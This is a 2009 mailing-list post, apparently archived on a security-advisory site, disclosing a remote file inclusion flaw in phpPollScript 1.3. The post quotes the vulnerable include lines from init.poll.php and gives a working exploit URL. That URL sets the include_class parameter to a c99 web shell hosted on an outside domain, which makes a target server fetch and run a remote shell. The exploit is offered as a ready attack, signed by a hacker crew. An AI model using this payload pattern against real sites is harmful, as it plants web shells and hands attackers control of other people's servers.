Related information

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

SMF (Simple Machine Forum) 1.1.11 XSS - Discovered by : Khashayar Fereidani

[ISecAuditors Security Advisories] PHP-Calendar <= v1.1 'configfile' Remote and Local File Inclusion vulnerability

[ISecAuditors Security Advisories] Simple PHP Blog <= 0.5.1 Local File Include vulnerability

Re: Powered By Dvbbs Version 7.1.0 Sp1 By Pass

From:	admin_(at)_ekin0x.com <admin_(at)_ekin0x.com>
Date:	21.12.2009
Subject:	phpPollScript - 1.3 Remote File Include

#phpPollScript <= 1.3 Remote File Include Vulnerability
#Download Script      :  http://download.tomex.org/phpPollScriptv13b.zip
#Author               :  ZZxxHackerzzXX
#Contact              :  admin@ekin0x.com
#Location             :  Turkey
########################################################################
#file :
#  init.poll.php
# line 2 $inc_path = dirname($include_class);
# line 3 require ($inc_path."/voting.poll.php");
########################################################################
#3xplo!t :
#http://target.com/[path]/php/init.poll.php?include_class=http://www.ekin0x.com/c99.txt?
########################################################################
#eser@ekin0x.com (all crew shell)
########################################################################